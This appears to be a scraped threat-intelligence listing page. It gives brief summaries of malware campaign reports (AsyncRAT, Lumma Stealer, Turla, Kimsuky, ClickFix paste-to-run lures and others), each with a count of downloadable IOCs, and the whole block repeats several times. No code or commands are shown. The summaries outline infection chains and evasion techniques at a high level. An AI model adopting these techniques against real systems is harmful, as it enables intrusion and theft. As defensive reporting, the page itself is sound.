This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
